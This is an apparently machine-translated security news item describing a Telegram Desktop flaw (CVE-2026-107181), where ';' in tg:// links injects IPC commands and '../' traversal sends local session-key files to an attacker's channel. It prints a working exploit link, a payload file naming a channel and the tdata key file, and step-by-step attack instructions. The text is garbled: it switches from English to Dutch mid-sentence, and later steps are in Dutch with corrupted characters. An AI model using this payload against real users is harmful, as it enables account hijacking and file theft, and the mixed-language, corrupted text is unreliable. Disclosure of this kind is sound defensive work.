Details and methods of exploiting the vulnerability (CVE-2026-107181) in Telegram Desktop, the official Telegram client for desktop systems, have been revealed. The issue arises from inadequate handling of unescaped separator characters in IPC commands, allowing an attacker to facilitate the transfer of any files from the victim's system, including files with session keys that can be used to hijack a Telegram account, by clicking on a sent link. The vulnerability has been resolved in Telegram Desktop release 7.2.9.
When clicking on 'tg://' links, the operating system launches the associated application Telegram Desktop for this type of link. If another instance of this application is already running on the system, the running process passes the link to it via a socket using the IPC interface. The problem is that if a ';' character is included among the link parameters (for example, 'tg://x?a=1;OPEN...'), the content is split, and the parts following the ';' character are processed as separate commands.
The attack utilizes the OPEN command along with the URI scheme 'interpret:', intended for launching scripts via IPC, which were used for automatically sending new releases to channels. The script consists of a predefined local file that specifies the file sent to the channel and the channel ID. The file path to the scripts is processed relative to the service subdirectory, but due to the lack of cleaning of '../' in file paths, the attacker can access files stored outside the base directory. For example, one can upload a file to their telegram group, and then reference that file as a script, preparing a link like:
tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt
Attack Steps:
- The attacker adds the victim to their group (under default settings, addition does not require confirmation from the added user) and sends a text file to that group specifying the channel and the path to the script. Telegram will save this file in a predefined system subdirectory when the victim enters the group.
channel: 2005234537
file: tdata/D877F783D5D3EF8Cs - The attacker sends the victim an innocuous-looking link to their host (for example, 'https://coolsite.org'), which when opened is redirected to de server the attacker, replacing it with a URI of the form 'tg://x?a=1;OPEN:interpret:ā¦;OPEN:interpret:ā¦.'
- Wanneer op de link wordt geklikt, roept de browser de URI-handler «tg://» aan, die de eerder genoemde reeks startcommando's activeert en leidt tot het verzenden van bestanden naar het kanaal van de aanvaller zonder enige meldingen of bevestigingsverzoeken.
- Door bestanden uit de subdirectory tdata met versleutelings- en autorisatiesleutels te verkrijgen, kan de aanvaller, bij gebrek aan een lokale gebruikerswachtwoord, de sessie van het slachtoffer op zijn apparaat klonen.
Bron: opennet.ru
